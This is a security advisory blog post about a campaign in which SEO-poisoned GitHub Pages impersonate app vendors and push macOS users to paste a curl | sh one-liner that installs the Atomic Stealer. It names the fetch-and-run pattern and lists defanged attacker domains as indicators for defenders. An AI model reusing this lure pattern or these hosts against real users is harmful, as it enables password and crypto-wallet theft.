SEO-Poisoned GitHub Pages Impersonate Popular Apps to Push macOS Atomic Stealer

By Ash K
SEO-Poisoned GitHub Pages Impersonate Popular Apps to Push macOS Atomic Stealer

Summary: A new campaign is abusing GitHub Pages and search-engine poisoning to rank high for queries like “Install <AppName> on Mac.” The pages impersonate well-known software vendors and redirect visitors to a site that instructs them to run a curl | sh one-liner. The final payload is the Atomic Stealer (AMOS) malware for macOS, which targets browser passwords and crypto wallets.

What’s happening

  • Attackers create polished look-alike repositories and host fake websites on GitHub Pages.
  • SEO techniques place these pages near the top of search results for “on Mac/MacBook” download queries.
  • Victims are redirected to a secondary domain that presents a copy-paste terminal command.
  • The command downloads and executes a script which retrieves and launches the AMOS payload.

Why it works

  • Trust leakage: Users equate “GitHub” + high Google rank with legitimacy.
  • UX bypass: A single paste of curl | sh leapfrogs Gatekeeper prompts and quietly chains multiple downloads.
  • Broad branding: The campaign impersonates many vendors (password managers, finance apps, productivity tools), increasing catchment.

Observed TTPs

  • Fake vendor pages on *.github.io with “on-Mac/MacBook” keywords.
  • Fast-flux redirects to temporary domains (redacted with [.]) that host shell scripts.
  • Second-stage download to /tmp, execution of a binary identified as Atomic Stealer.

Potential Indicators (redacted)

Examples for defenders; do not browse:

  • Redirectors: macprograms-pro[.]com/...
  • Second stage: bonoud[.]com/get3/install.sh, .../get3/update
  • Payload behavior: writes to /tmp, touches browser credential stores, attempts wallet file access.

Risk & impact

AMOS steals browser passwords, autofill data, and crypto wallet secrets, enabling account takeover and financial loss. Because the lure brands include password managers and finance apps, the downstream impact can be severe.

What users should do

  • Never run curl | sh from a website. Get installers from the vendor’s official domain or verified GitHub organization only.
  • Check that downloads are signed (.pkg or app bundle) and validate the developer ID.
  • If you pasted a one-liner recently, disconnect, rotate passwords, review wallets, and scan the Mac with reputable security tools.

Guidance for security teams

  • Hunt for process chains: curlbash/sh → file drop in /tmp → outbound to new domains.
  • Block known IOCs and monitor for suspicious GitHub Pages referrals + immediate redirects.
  • Educate users: “download only from official vendor domains; never copy/paste terminal commands from download pages.”

Bottom line

This is a textbook example of attackers weaponizing trusted platforms and search ranking. A single copy-paste can defeat UX guardrails on macOS—so reinforce your download hygiene and block one-liner install patterns across the fleet.

Ash K
Ash K
Ashton is a seasoned Cybersecurity Professional with over 25 years of experience in Cybersecurity Research, Cybersecurity Incident response, Products and Security Solutions architecture.